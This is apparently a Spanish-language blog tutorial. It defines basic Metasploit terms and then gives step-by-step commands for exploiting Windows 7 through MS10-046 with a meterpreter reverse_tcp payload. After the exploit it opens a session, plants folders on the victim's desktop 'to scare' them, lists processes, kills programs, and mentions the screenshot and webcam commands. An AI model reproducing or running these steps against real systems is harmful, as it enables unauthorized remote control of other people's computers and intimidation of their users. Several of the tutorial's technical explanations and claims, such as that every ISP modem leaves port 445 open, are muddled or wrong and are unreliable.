¿Que es Metasploit?
Metasploit es una herramienta muy extensa y útil para cualquier cosa programada en C#,PERL,ASP,PERL,etc, esta herramienta se basa en penetración, sistema wireless, escaneo de puertos, scanners,etc, se forma de "exploits, auxiliarys , nops , post , encoders , payloads " también les respondere que es cada uno de esos.
¿Qué es Exploit?
Como su palabra dice "explotar" alguna vulnerabilidad osea un "HUECO DE SEGURIDAD" para que entiendan mejor se basa en una mal programación del syntaxis osea que el programador es perezoso a su deber.
¿Qué es Payload?
Para que entiendan mejor es una lista de códigos que se ejecutan remotamente.
¿Que es un Encoder?
Un "Encoder" como su palabra lo dice "Encodear" se trata de que el payload llegue a su destino y no a otra parte para ejecutar bien el payload y no nos de error en alguna otra forma.
¿Qué son Nops?
Los nops mantienen mantienen el tamaño absoluto del "Payload" y permite también que no nos de error al ejecutarlo.
¿Qué son Auxiliarys?
Auxilirys son "SCANNERS" que ya vienen incrustado en la herramienta metasploit, ejemplo podrían ser las siguientes.
- SSH(SECURE SHELL)
- VNC (VIRTUAL NETWORK COMPUTING)
- FTP (TRANSFERENCIAS DE FICHEROS)
Okey y como verán ya les explique lo más básico ahora si vamos a comenzar como explotar la vulnerabilidad de Windows 7, okey entonces empezemos abriendo la consola de metasploit abriremos la consola y pondremos msfconsole ojo les escribire otra cosa algunos que utilizarán distribuciones con permisos "ROOT" no es necesario colocar "SUDO", pero para otros que no tendrán autorización "ROOT" es necesario colocar "SUDO", okey para algunos que utilizarán distribuciones ya con las herramientas instaladas no es necesario instalar metasploit pero para algunos otros que no tendrán instalado metasploit es necesario instalarlo, okey apenas que ejecutemos metasploit nos aparecerá lo siguiente.
Foto:
Y listo ya la consola metasploit ya está abierta ahora pondremos "search lnk" para encontrar el exploit "ms10_046" ojo sin las comillas y nos aparecería lo siguiente:
Foto:
Okey entonces colocaremos lo siguiente.
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST Iplócal
set URIPATH /
set LHOST Iplócal
set payload windows/meterpreter/reverse_tcp
exploit
Ojo les digo algo este metodo lo estoy haciendo en Ip Lócal no "Ip Pública", algunos otros no sabrán como sacar su dirección Ip Lócal es fácil colocariamos lo siguiente - > ifconfig y daríamos enter y nos aparecerá nuestra dirección Ip okey y después de qué hemos recopialo el exploit y el payload nos aparecerá el siguiente link.
Foto:
Y como verán ya se nos ha creado el servidor y la URL y como escribi antes mi victima será un sistema operativo Windows 7 he creador la máquina virtual abriremos el pátetico navegador Internet Explorer y pondremos nuestra dirección Ip Local URL creada y la ponemos y nos aparecerá lo siguiente.
Foto:
Okey y como verán nos aparecerio una alerta detrás de la terminal es normal y le daremos a permitir y nos aparecerá los siguientes archivos.
Foto:
Entonces nos apareció los sigueintes archivos.
¿Cuál ejecutaremos?
Ejecutaremos el archivo cXgNXKVQNzS y nos aparecerá lo siguiente al ejecutarlo.
Foto:
Okey y como verán ya se nos ha creado la session meterpreter, okey entonces como ven pondremos lo siguiente para entrar a la session, colocaríamos.
sessions -i 1
Foto:
Okey ya nos hemos logeado en la session meterpreter, algúnos también se preguntarán.
¿Qué es Meterpreter?
"Meterpreter" como se dice su palabra es un "Plúgin" creado por los mismos creadores de metasploit lo reconocemos como una "SHELL" para poder tener el control total del Sistema.
Okey entonces colocariamos el signo de interrogación "?" sin las comillas y nos aparecera los siguientes comandos.
Foto:
Okey hay solo tome pantallazo son una parte de los comandos y vienen más, okey entonces ahora haremos "SPAMM" en el escritorio de la victima para que se asuste, colocariamos lo siguiente, el nombre de la carpeta que le pondre sera "holapost" sin las comillas, entonces nos quedaría así.
Foto:
Como verán no se qué es qué pasa pero bueno al ejecutar los comandos nos creara la lista de directorios
- mkdir - creación de directorios.
- rmdir - eliminación de directorios.
- screenshot - Fotografía.
- Webcam_List - Foto de camara.
Okey algunos otros se preguntarán como saber que programas tiene abierto la victima, muy facil pondriamos "ps" sin las comillas y nos aparecera lo siguiente.
Foto:
Okey y como verán nos apareció la lista de programas que tenemos abiertos y cual cerraremos?, cerraremos notepad.exe y pondriamos entonces lo siguiente.
Foto:
Y como verán se nos desapareció el notepad osea bloc de notas, bueno esto fue todo espero que hayán entendido este metodo de explotación ya que es básico en el otro post les vengo a explicar como penetrar el sistema Windows xp mediante el exploit, ms10_08 claro para esta vulnerabilidad hay que tener el puerto 445 tcp/open pero es algo obvio que los ISP de todos los modems tienen el puerto 445 abierto, bueno esto fue todo y hasta la próxima.
No hay comentarios.:
Publicar un comentario